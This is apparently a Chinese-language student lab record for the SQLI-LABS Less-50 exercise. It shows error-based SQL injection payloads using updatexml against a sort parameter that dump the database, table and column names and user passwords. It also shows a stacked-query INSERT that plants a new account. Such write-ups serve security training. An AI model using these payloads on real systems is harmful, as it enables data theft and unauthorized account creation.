SQLI-LAPS 实验记录
Less-50
这一关我们采用报错注入的方式,可以查询到数据库名称、表名、列名等信息。
首先我们在命令行中输入sqlmap命令:
sql
?sort=1
结果如图所示,列出了数据的具体信息,但这不是我们想要的方式。
接下来,我们尝试使用updatexml摄氏注入的方法来进行注入。
sql
?sort=1 and updatexml(1,concat(0x7e,database(),0x7e),1)#
结果如图所示,爆出了数据库名称,接下来我们就可以继续报错注入的方式,查询表名、列名等信息。
- 查询表名:
sql
?sort=1 and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1)#
- 查询列名:
sql
?sort=1 and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1)#
- 查询数据:
sql
?sort=1 and updatexml(1,concat(0x7e,(select concat(username,id,password) from security.users where id=1),0x7e),1)#
除此之外,我们还可以使用insert方式,向数据库中插入我们想要的账号和密码信息:
sql
?sort=1; insert into users(username,id,password) values('heze111',111,'love')#
可以看到,帐号heze111与密码love已经插入到数据库当中了。